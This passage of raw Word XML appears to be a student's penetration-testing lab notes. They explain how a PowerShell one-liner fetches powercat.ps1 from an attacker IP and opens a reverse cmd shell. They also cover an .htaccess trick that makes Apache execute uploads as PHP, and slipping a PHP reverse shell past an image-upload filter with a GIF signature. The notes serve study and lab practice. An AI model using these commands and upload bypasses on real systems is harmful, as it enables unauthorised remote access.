          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powercat.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (instead of nc.exe) to upgrade from web shell to reverse shell connection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we need to get powercat.ps1 in our Kali and then host on python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="144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10B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="357"/>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10B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we run this command in the webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Powershell IEX(New-Object System.Net.WebClient).DownloadString('http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.49.211/powercat.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">');powercat -c </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.49.211</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 80 -e cmd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We need the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Powershell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" command at the start in order to run the following command as powershell. This is because webshells are likely in CMD format, and the command is in powershell so we need to specify powershell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010BA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010BB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010BD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What it does: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .htaccess is a per-directory config file Apache interprets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The line tells Apache: "treat any file ending in .xxx as PHP code."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Normally, Apache only executes files with .php, .php5, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If upload restrictions block .php files but allow odd extensions (e.g., .xxx), the server wouldn’t normally run them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But with this .htaccess trick, you force Apache to interpret .xxx as PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache checks .htaccess for AddType directives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP is registered with Apache as the handler for application/x-httpd-php.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You basically "teach" Apache to treat your fake extension as PHP code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When it doesn't work:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If .htaccess files are disabled in Apache (AllowOverride None).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the web server isn’t Apache or doesn’t support .htaccess (e.g., Nginx, IIS).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the app sanitizes uploads to block .htaccess.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If PHP isn’t running as an Apache module (e.g., php-fpm with Nginx).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010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D0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ez2o5der4e9c" w:id="135"/>
      <w:bookmarkEnd w:id="135"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading reverse shell as an image using GIF signature</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId334">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Blogger</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we were able to leave a comment in the website as well as add an image. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We first tried just changing the file extension from .php to .gif and this might work on some websites, but not this one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we tried adding the GIF signature to the top of the reverse shell file. This tells the backend that this is a GIF. And we kept the file extension .php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4386263" cy="1244180"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68" name="image56.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image56.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId335"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4386263" cy="1244180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="955"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The GIF signature is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GIF89a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once we uploaded it, we could click on "shell.php" in the comments, which executed the reverse shell and we got foothold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010D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0DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6gxvond7ssqw" w:id="136"/>
      <w:bookmarkEnd w:id="136"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading webshell to reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rkp11qe6wm29" w:id="137"/>
      <w:bookmarkEnd w:id="137"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 19.3.2. Plink video,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> we saw a neat way to use a webshell to get a reverse shell back to the Kali machine. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here’s how to do it on a Linux target (instead of windows)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
